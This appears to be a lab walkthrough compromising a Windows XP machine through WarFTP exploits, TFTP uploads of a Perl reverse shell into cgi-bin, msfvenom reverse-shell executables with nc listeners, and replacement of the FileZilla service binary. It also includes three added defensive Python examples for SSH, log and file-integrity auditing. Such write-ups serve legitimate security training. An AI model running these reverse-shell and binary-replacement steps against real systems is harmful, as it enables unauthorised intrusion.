1. Network discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.28.
2. Port scan
nmap -Pn 10.0.2.28
nmap -Pn -p1000- 10.0.2.28
There are four open ports: 21, 22, 23, and 80.
3. OS and service scan
nmap -A -p21,22,23,80 10.0.2.28
The services are listed below:
- Port 21 WAR-FTPD 1.65 w/ anonymous login
- Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
- Port 23 telnet
- Port 80 Tinyweb httpd 1.93
4. Vuln scan
nmap --script vuln -p21,22,23,80 10.0.2.28
No useful information.
Service Enumeration and exploitation
ftp 10.0.2.28
Name: anonymous
Password: (empty)
Explore its directory
ls -la
get bin
I don’t have any permission except READ.
cd /bin
ls -la
TINY.EXE indicates that this /bin may be related to the Tinyweb httpd service.
cd ../log
ls -la
There are logs, and the interesting one is OpenTFTPServerMT.log. This indicates that a TFTP server may be running on this machine.
cd ../root
ls -la
There are index.html and cgi-bin. This may mean that this directory stores the data for Tinyweb httpd.
cd cgi-bin
ls -la
No data here.
Next is to search for a public exploit script.
After searching for exploits with Google, I came across this one on Offensive Security’s Exploit Database Archive:
WarFTP 1.65 - ‘USER’ Remote Buffer Overflow (CVE-2007-1567), remote exploit for the Windows platform
When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.
To compile the script on Linux, in my experience, I always encounter many problems using the Linux command line. So I will use wine to install Dev-C++, compile the script with Dev-C++ to get an exe file, and finally run the exe with wine again.
First, download Orwell Dev-C++:
Orwell Dev C++ 5.7.1
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
Continue the installation process the same way as on Windows.
Copy the code
When compiling, I encountered errors.
After googling, I found that I need to add “-lws2_32” to the compiler option.
Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.
Compiling again, now I got an exe file.
Run the exe w/ wine
Supply an option. Since the target system is XP SP3, I’ll use the options that are closest to the target.
wine 3570.exe 10.0.2.28 5
Connect to port 7777
telnet 10.0.2.28 7777
Use another option
wine 3570.exe 10.0.2.28 13
Connect to port 7777
telnet 10.0.2.28 7777
I also found another Python script that was tested on Windows XP SP3. I’ll try to use this.
Read the script
I have to create new shellcode to match my machine. Here is my command.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
Copy the new shellcode into the Python script and edit the target IP.
Create a listener on port 443
rlwrap nc -lvp 443
Run the script
Back at the listener, no shell. I’ll proceed to the next service.
Connecting with ssh fails: “No matching key exchange found. Cannot connect.”
Specify the key exchange algorithm and cipher:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc 10.0.2.28
Now I can connect.
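The connection only succeeds because the server still offers a SHA-1 group-1 key exchange and 3DES-CBC, both of which modern OpenSSH clients disable by default. As an added example that is not part of the original write-up, the following Python parses the client’s “no matching … found. Their offer: …” refusal messages and reports which of the server’s offered algorithms are legacy, so an administrator can see exactly what a server still accepts. The sample messages and the legacy-algorithm sets are constructed assumptions for the example.

```python
import re

# Constructed sample OpenSSH client refusals (not output copied from the post).
SAMPLE_SSH_ERRORS = [
    "Unable to negotiate with 10.0.2.28 port 22: no matching key exchange method found. "
    "Their offer: diffie-hellman-group1-sha1",
    "Unable to negotiate with 10.0.2.28 port 22: no matching cipher found. "
    "Their offer: 3des-cbc,aes128-ctr",
]

# Legacy algorithms that current OpenSSH clients no longer enable by default.
# These sets are an assumption for the example; extend them to match local policy.
LEGACY_KEX = {
    "diffie-hellman-group1-sha1",
    "diffie-hellman-group14-sha1",
    "diffie-hellman-group-exchange-sha1",
}
LEGACY_CIPHERS = {"3des-cbc", "blowfish-cbc", "cast128-cbc", "arcfour", "arcfour128", "arcfour256"}

OFFER_RE = re.compile(
    r"no matching (?P<kind>key exchange method|cipher|host key type|MAC) found\. "
    r"Their offer: (?P<offer>[\w@.,+-]+)"
)


def parse_offer(line):
    """Return (kind, [offered algorithms]) from one refusal line, or None if it is not one."""
    m = OFFER_RE.search(line)
    if not m:
        return None
    return m.group("kind"), m.group("offer").split(",")


def classify(kind, offered):
    """Split an offer into legacy and acceptable algorithms for the given negotiation kind."""
    legacy_set = {"key exchange method": LEGACY_KEX, "cipher": LEGACY_CIPHERS}.get(kind, set())
    legacy = [a for a in offered if a in legacy_set]
    acceptable = [a for a in offered if a not in legacy_set]
    return legacy, acceptable


def audit(lines):
    """Summarise every refusal: what the server offers and how much of it is legacy."""
    report = {}
    for line in lines:
        parsed = parse_offer(line)
        if parsed is None:
            continue
        kind, offered = parsed
        legacy, acceptable = classify(kind, offered)
        report[kind] = {
            "offered": offered,
            "legacy": legacy,
            "acceptable": acceptable,
            # only_legacy means a modern client cannot connect at all without opting in
            "only_legacy": bool(legacy) and not acceptable,
        }
    return report


if __name__ == "__main__":
    for kind, r in audit(SAMPLE_SSH_ERRORS).items():
        print(f"{kind}: legacy={r['legacy']} acceptable={r['acceptable']} only_legacy={r['only_legacy']}")
```

When only_legacy is true for a kind, the server itself is the finding: the fix belongs in the server’s sshd_config (KexAlgorithms and Ciphers directives) rather than in re-enabling the old algorithm on every client.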
Search for public exploits
Open Metasploit and search for exploits
use 2
show options
set RHOST 10.0.2.28
set LHOST 10.0.2.27
set LPORT 443
run -j
Failed. I’ll proceed to the next service.
telnet 10.0.2.28 23
I don’t have any credentials.
Access the site
View page source
nikto -h http://10.0.2.28
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q
5. Remember from the FTP enumeration that there’s a TFTP log. TFTP is a file transfer protocol based on UDP port 69. I’ll scan for open UDP ports.
nmap -sU -sV 10.0.2.28 -vvvv
There’s open UDP port 69.
Remember from the FTP enumeration that a reverse shell Perl script can be uploaded to cgi-bin.
I’ll upload test.txt. First I’ll switch TFTP to binary mode.
mode binary
put test.txt root/cgi-bin -> failed
put test.txt /cgi-bin -> failed
put test.txt cgi-bin/ -> failed
put test.txt cgi-bin/test.txt -> succeeded
Now access /cgi-bin/test.txt
I can upload the file, but I cannot run it.
Next is uploading a Perl “Hello World” script from this guide:
A First Perl CGI Script
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
Access it via HTTP
1. Prepare a listener on port 443
rlwrap nc -lvp 443
2. Create a reverse shell script; I used this guide:
PayloadsAllTheThings (swisskyrepo): a list of useful payloads and bypasses for Web Application Security and Pentest/CTF
Copy only the Perl code and edit the IP and port to match your listener.
put exploit.pl cgi-bin/exploit.pl
Access it; there’s an error.
I edited the script as shown in the snapshot.
put exploit.pl cgi-bin/exploit2.pl
3. Back at the listener, now I got the shell.
4. Verify the shell
1. List system info
This machine is 32-bit.
2. List system tasks
tasklist /FI "username eq SYSTEM"
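The chain above works because the TFTP server’s root is the web server’s document root and the web server executes whatever lands in cgi-bin. As an added example that is not part of the original post, the following Python shows how a defender would catch this from logs: it flags every TFTP write request into an executable directory and escalates when the same path is then requested over HTTP. The TFTP log line shape and the Common Log Format access log are constructed assumptions (the real OpenTFTPServerMT log format is not shown on the page).

```python
import re

# Constructed TFTP server log. The line shape (timestamp, op, client, path) is an
# assumption for this example; the real OpenTFTPServerMT format is not shown on the page.
TFTP_LOG = [
    "2020-01-01 10:00:01 WRQ 10.0.2.27 cgi-bin/test.txt",
    "2020-01-01 10:00:40 WRQ 10.0.2.27 cgi-bin/helloworld.pl",
    "2020-01-01 10:02:15 WRQ 10.0.2.27 cgi-bin/exploit.pl",
    "2020-01-01 10:03:00 RRQ 10.0.2.27 index.html",
    "2020-01-01 10:03:30 WRQ 10.0.2.27 uploads/notes.txt",
]

# Constructed web server access log in Common Log Format (assumed for the example).
ACCESS_LOG = [
    '10.0.2.27 - - [01/Jan/2020:10:00:05 +0000] "GET /cgi-bin/test.txt HTTP/1.1" 200 12',
    '10.0.2.27 - - [01/Jan/2020:10:02:30 +0000] "GET /cgi-bin/exploit.pl?x=1 HTTP/1.1" 500 0',
    '10.0.2.27 - - [01/Jan/2020:10:03:01 +0000] "GET /index.html HTTP/1.1" 200 512',
]

# Directories whose files the web server executes rather than serves.
EXEC_DIRS = ("cgi-bin/",)

TFTP_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<op>WRQ|RRQ) (?P<client>\S+) (?P<path>\S+)$")
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(path):
    """Strip the query string and leading slashes so TFTP and HTTP paths compare equal."""
    return path.split("?", 1)[0].lstrip("/")


def tftp_writes_to_exec_dirs(tftp_lines):
    """Return (client, path) for every TFTP write request landing in an executable directory."""
    hits = []
    for line in tftp_lines:
        m = TFTP_RE.match(line)
        if not m or m.group("op") != "WRQ":
            continue  # reads (RRQ) and unparseable lines are not interesting here
        path = normalize(m.group("path"))
        if path.startswith(EXEC_DIRS):
            hits.append((m.group("client"), path))
    return hits


def requested_paths(access_lines):
    """Set of normalized paths the web server was asked for."""
    paths = set()
    for line in access_lines:
        m = CLF_RE.match(line)
        if m:
            paths.add(normalize(m.group("path")))
    return paths


def correlate(tftp_lines, access_lines):
    """Alert on each write into an executable directory; escalate if the file was then fetched.

    Ordering in time is deliberately ignored for brevity: any HTTP request for the
    same path counts as execution of the uploaded file.
    """
    fetched = requested_paths(access_lines)
    alerts = []
    for client, path in tftp_writes_to_exec_dirs(tftp_lines):
        was_fetched = path in fetched
        alerts.append({
            "client": client,
            "path": path,
            "fetched": was_fetched,
            "severity": "high" if was_fetched else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(TFTP_LOG, ACCESS_LOG):
        print(alert)
```

A medium alert already means the TFTP root overlaps a directory the web server executes, which is a configuration the two services should never share; the high alert is the point at which an uploaded file has been executed.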
I will replace an exe file w/ reverse shell. I’ll start w/ “FileZilla server.exe” because I don't have any permission except READ.
Let’s change directory to “\”
I could not change directory as expected. I need a more reliable shell.
2. Create and upload another shell
Create a listener on port 80
rlwrap nc -lvp 80
Create exe shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell.exe
Upload it w/ tftp
put shell.exe cgi-bin/shell.exe
Run the shell from the listener on port 443
Back at the listener on port 80, I got another shell.
3. Replacing FileZilla
On the listener on port 80:
Find the FileZilla exe path
dir "FileZilla server.exe" /s /b
Find the task name and stop it
net stop "FileZilla Server FTP server"
Next is replacing it with another reverse shell.
Back on the attacker machine, create an exe reverse shell on port 21
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=21 -e x86/shikata_ga_nai -f exe > shell2.exe
Upload w/ tftp
put shell2.exe cgi-bin/shell2.exe
Create a listener on port 21
rlwrap nc -lvp 21
Back at the shell/listener on port 21
cd "\Program Files\FileZilla Server"
dir
Rename the old exe file as a backup
rename "FileZilla server.exe" "FileZilla server.exe.bak"
dir
Copy shell2.exe to replace FileZilla
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"
dir
Start the FileZilla task
net start "FileZilla Server FTP server"
Back at the listener on port 21: judging by the path, I’m administrator (root).
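The final step swaps a service binary under Program Files for another executable and leaves the original beside it as a .bak file. As an added example that is not part of the original post, here is a small Python file-integrity check a defender can run against a service directory: it records SHA-256 hashes at install time and later reports modified, added and removed files, with a specific flag for the replaced-executable-plus-backup pattern seen above. The demo() function builds a throwaway directory with placeholder contents (constructed, not the real binaries) and replays the rename-and-copy sequence to show what the comparison reports.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare_baseline(baseline, root):
    """Report which files changed, appeared or vanished since the baseline was taken."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def suspicious(report):
    """Flag the pattern from the post: an .exe changed while an identically named .bak appeared."""
    flags = []
    for p in report["modified"]:
        if p.lower().endswith(".exe") and any(a.lower() == p.lower() + ".bak" for a in report["added"]):
            flags.append(p)
    return flags


def demo():
    """Constructed scenario: placeholder 'service binary', baseline, then rename-and-copy."""
    root = tempfile.mkdtemp()
    try:
        svc = os.path.join(root, "FileZilla Server")
        os.makedirs(svc)
        exe = os.path.join(svc, "FileZilla server.exe")
        with open(exe, "wb") as f:
            f.write(b"placeholder for the original service binary")  # constructed content
        baseline = build_baseline(root)
        # Replay the sequence from the post: keep the original as .bak, drop another file in its place.
        os.rename(exe, exe + ".bak")
        with open(exe, "wb") as f:
            f.write(b"placeholder for a different executable")  # constructed content
        report = compare_baseline(baseline, root)
        return report, suspicious(report)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    report, flags = demo()
    print(report)
    print("replaced executables with backup left behind:", flags)
```

Take the baseline when the service is installed or updated, store it somewhere the service account cannot write, and compare on a schedule and on every service restart; a modified service executable that is not part of a planned update is the event worth paging on.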